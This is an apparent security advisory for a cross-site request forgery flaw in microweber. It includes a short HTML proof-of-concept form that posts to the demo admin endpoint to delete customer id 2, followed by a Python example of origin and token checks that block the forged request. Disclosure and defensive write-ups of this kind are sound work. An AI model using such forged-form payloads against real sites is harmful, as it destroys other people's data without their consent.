Cross-Site Request Forgery (CSRF) in microweber/microweber
Status: Valid
Jul 30th 2021
An attacker is able to delete any customer if they know the value of the customer's id parameter.
🕵️♂️ Proof of Concept
After opening PoC.html in Firefox or Safari and clicking the submit button (the form can also be made to auto-submit), you will see that the customer with id 2 has been deleted.
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/admin/customers/delete" method="POST">
      <input type="hidden" name="id" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Here the customer with id value 2 will be deleted after the submit button is clicked.
📍 Location app.js#L1
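The PoC works because the delete endpoint accepts any POST carrying the victim's session cookie, with nothing that proves the request was issued by the application's own page. As an added illustration (not microweber's code, which is a PHP application), the following Python shows the two server-side checks a state-changing endpoint such as /admin/customers/delete should enforce: a same-origin check on the Origin/Referer headers, and a synchronizer token compared in constant time. The origin `https://demo.microweber.org` is taken from the PoC's form action; the field name `_token`, the `Request` model, and the customer set are assumptions constructed for the demo. The forged request from the PoC (cross-site Origin, no token) is refused, while a request from the site's own form passes.

```python
"""Server-side CSRF checks that would stop the forged delete request above.

Added illustration, not microweber's code: a minimal request model and two
independent checks (same-origin header check and synchronizer token) that a
state-changing endpoint such as /admin/customers/delete should enforce.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "https://demo.microweber.org"  # origin of the application (from the PoC URL)
TOKEN_FIELD = "_token"                        # hidden-field name carrying the token (assumed)


@dataclass
class Request:
    """Constructed stand-in for an incoming HTTP request."""
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def new_session_token() -> str:
    """Per-session CSRF token: stored server-side and echoed into legitimate forms."""
    return secrets.token_hex(32)


def origin_matches(request: Request) -> bool:
    """Check 1: the Origin header (or Referer as fallback) must equal the site's own origin.

    Browsers attach these headers to cross-site form posts and page script cannot forge them.
    A request that carries neither header is rejected (fail closed).
    """
    origin = request.headers.get("Origin")
    if origin is None:
        referer = request.headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == SITE_ORIGIN


def token_matches(request: Request, session_token: str) -> bool:
    """Check 2: the token in the form must equal the session's token.

    A cross-site page cannot read the victim's token, so a forged form cannot include it.
    compare_digest avoids leaking the token through timing differences.
    """
    submitted = request.form.get(TOKEN_FIELD, "")
    return hmac.compare_digest(submitted, session_token)


def is_csrf_safe(request: Request, session_token: str) -> bool:
    """Safe methods change no state; every other method needs both checks to pass."""
    if request.method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True
    return origin_matches(request) and token_matches(request, session_token)


def handle_delete(request: Request, session_token: str, customers: set) -> tuple:
    """Delete handler that refuses forged requests. Returns (status, remaining customer ids)."""
    if not is_csrf_safe(request, session_token):
        return 403, sorted(customers)
    customers.discard(int(request.form["id"]))
    return 200, sorted(customers)


def demo() -> tuple:
    """Run the PoC's forged request and a legitimate one against the hardened handler."""
    token = new_session_token()
    customers = {1, 2, 3}  # constructed sample data
    forged = Request("POST", "/demo/admin/customers/delete",
                     headers={"Origin": "https://attacker.example"},  # constructed attacker origin
                     form={"id": "2"})
    legit = Request("POST", "/demo/admin/customers/delete",
                    headers={"Origin": SITE_ORIGIN},
                    form={"id": "2", TOKEN_FIELD: token})
    forged_result = handle_delete(forged, token, set(customers))
    legit_result = handle_delete(legit, token, set(customers))
    return forged_result, legit_result


if __name__ == "__main__":
    print(demo())  # ((403, [1, 2, 3]), (200, [1, 3]))
```

Both checks are kept independent on purpose: the origin check alone is defeated when a browser omits the header (some privacy settings strip Referer), and the token alone is defeated if the token ever leaks, so requiring both gives defence in depth. Setting the session cookie with `SameSite=Lax` or `Strict` is a third, browser-enforced layer that complements the server-side checks shown here.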